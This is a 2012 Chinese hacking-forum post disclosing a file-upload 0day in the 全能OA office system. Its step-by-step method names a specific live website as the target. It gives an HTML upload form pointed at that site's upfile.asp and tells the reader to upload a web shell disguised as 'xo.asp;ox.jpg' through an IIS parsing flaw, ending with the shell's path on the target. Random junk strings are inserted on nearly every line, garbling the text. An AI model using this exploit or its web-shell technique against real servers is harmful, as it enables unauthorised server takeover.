中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
; }- h+ s) |' f. F5 c/ e: _4 }- u. ^4 L
系统介绍:+ W5 m" c) E' C/ e4 \. {  L
  G- c; d2 ]! S# ^$ j" w; ~
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。# k/ k0 a" z( H) w0 T: s2 h; s

$ J8 Z3 I8 F5 i5 W0 a' E: v主要功能:
+ i, o# a/ O6 ^2 J( S% z4 P- X公司通告
$ W3 r: W  w# z; D6 e8 _; b+ j工作计划
  C; ^, [0 G2 e3 h: j: R4 u. V) y通讯助理 / t" }0 r) R# i. v+ `" V9 ]4 K- A
客户资源
. @# d9 [- b: m3 s/ i$ j我的公文
8 J+ ?. U1 u. [! L, N8 _公文传阅
1 D6 Z" O& _" o7 q公共资源
9 P; n5 Q6 g8 X: m8 P资源预约
! H2 _( P$ Q) O. V1 C! }今日考勤 6 d4 g- `4 R, [
个人计划
5 f4 T0 M% l0 m: ~- `3 C( p个人通讯录 ; G1 J# j% w4 W
个人基本档案 , ]& O1 {( v3 \; a$ |
未读邮件
4 T: f6 _' J, T* C9 P8 p发邮件
' u& s5 Z& H# C$ K, Z& p8 J收件夹 * i& c: Y- ^; s; e, s
寄件夹 7 }- F  S# d3 H- G4 g
网络硬盘 ! E8 s) {* ]+ \0 Z9 j
网络会议 " M4 o( ~$ [% w1 ]7 P5 d' s
网络调查 0 H' B$ S& b( P
交流论坛3 n" |7 o. v+ c$ l

& _' q- ?6 L, K  @- M有兴趣测试的朋友可以下源码看看
' D# _8 m  m1 d% S  T) F" w9 ~& Z8 B; ]' L5 x  o4 u; @
源码下载:
8 m  w' Q) ?5 ~& U: [/ I) }: A+ l' b3 p" B; T3 h
http://www.mycodes.net/30/4750.htm; ^# R' e5 p: t$ G* x
" E  D6 I4 M( t5 K& Q
漏洞介绍:0 \5 ?5 i  ^* K( Q

1 W7 q- W$ ?5 E& X$ E( [; t由upfile.asp上传文件漏洞引起9 e+ s* ?6 S4 |7 ^. C. a
! }3 G- |8 q& J; x
测试方法:# t+ h8 S, G+ ]: f6 o
, p) a# h- O  r8 G
使用名小子上传http://www.itlynn.com/upfile.asp即可
* w4 k# m) P5 |  d* p
0 x3 X& r% H% g0 O8 ~( L如果upfile.asp文件被删除不存在。
: Z) O3 e% ]9 u
; R& y! }/ l" A# W0 v  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp8 w* O: P3 @( n+ b' {% `
# Z( `, Q' g6 I, l2 x2 J! v" F# C
如果存在那么将如下代码保存为upfile.html。; S* @5 H, H% m6 r: _$ Q/ w
7 `* H0 ^7 a. @8 r4 x3 w0 O% M
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
2 Z$ j! _1 |, W2 T& a; l
9 m0 L. A' r* \& F0 @. R , y3 }0 q8 a% K4 y8 X0 M

; D7 Q5 ~. D- \8 v& }" Y01 <table border='0' align="center" cellpadding="5">
" D4 d: Q0 V, ?4 G& d( g
" t4 z/ y; ?9 E- @02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
9 v; i2 D2 c& M; d! a5 P& x" z; [) A) ]% }
03 <tr> . H; Q- |5 U- e5 J& a% C
8 F8 @) E6 c" U3 M) m
04             <td>报错:</td> # v: m7 I2 r9 v. ~7 |
3 j7 \3 G, r  f- `
05             <td><input type='radio' name='errnumber' value='0'> 9 q! e  e5 f: C0 G* B. U
& t- o; @( I5 |# f. l7 H! M2 ?8 p
06               自动更名
% ~5 j  e9 ~# h& v6 e* \% F
9 }! ^2 U* h& _* X% u07               <input type='radio' name='errnumber' value='1' checked>
) V# r( I) J0 Y" L2 @( C8 d  |9 ]# K: W, q7 `/ N
08               报错方式
/ ~# f* L# ^: n4 N: b& N5 ]( p" n1 R4 Q! T% B; ?( x
09               <input type='radio' name='errnumber' value='2'> " R- @, z" |5 T. g
1 Z6 z, \. _2 n  p* M
10               直接覆盖</td> / ~. }+ l: w% y2 h1 V
' L6 x8 i- l7 p
11           </tr>
. p1 ?+ g0 F, ?9 d7 ]
3 }& H- s. A4 U& H" Z12           <tr>
6 y; Q4 n& v! S1 ^, V4 M! C5 {) ~. C
) V7 ]  _, B2 ^4 T4 z13             <td>主题:</td>
% w7 x. M5 F" y
9 I, b4 k* c! V* s8 j$ P' B' I14             <td><input type='text' name='filename' size='30'></td> 2 n, O* {% q, z# ]/ u8 @5 a9 }( S

& U9 W! y! Q9 {9 e) x15           </tr> ; t. G4 P3 h; e6 k3 D3 E  V" Q. G
8 H! Z  B4 N1 L) j: |3 d8 b
16           <tr> 0 o3 W! O2 B7 u
2 U+ ?: h& w) G6 K3 A
17             <td>文件:</td>
: w0 h! d: T7 D8 ?9 `% S& u) O. _( N9 I# ^
18             <td><input type="file"name="fruit"size="30"></td>
( O5 X5 {9 G9 H5 y3 a, Y9 B, _, t, l
2 ?# E  \; R! J: R0 r19           </tr>
& Q1 |: X* V- {; |( y* N8 r; X1 X7 w& Y7 ]% s
20           <tr> , M% U: C; i/ [: n- d- ]: T' n0 J
# X8 h5 M2 w+ A" G) b; a
21             <td valign='top'>简介:</td>
$ n' Z, r5 }- \8 Q0 c' ?" Y4 X, Z& \. a' N! [& {
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 3 k7 ^) X* f% }; [
6 L1 o: p# F4 k( a2 A& n
23           </tr>
# j- S- Q1 u9 j+ g  F/ R% q. _, w4 m, e$ Z) _
24   - M( M3 C- v8 O, h& b) L
# S4 Q  l: T. x" o
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>   e- r7 ?' N% s, k) ?% A

* I. _9 W: Z' }( N. p* [7 s26           </tr>
+ h- d7 T5 g; n; Y
& y& i* m+ T, _" O4 s; }9 l27         </form>
( z* N% }; R8 {0 z  G, [. h  u
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
) F1 }, d9 o9 z, s) x' m( C3 x1 b8 r$ V/ O: z" P+ u

. h7 P0 A2 L7 l5 c( [
, U/ o0 U# e# O* |! y. ~上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
0 v6 P* [4 T! N& i5 c% z- g! {
2 y4 M; m1 I. e  ^3 t) Q: M9 `此漏洞需要配合解析漏洞利用。
0 Y0 k3 F; D) S' V% Y+ I! U9 q1 r# h+ D8 U7 L





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2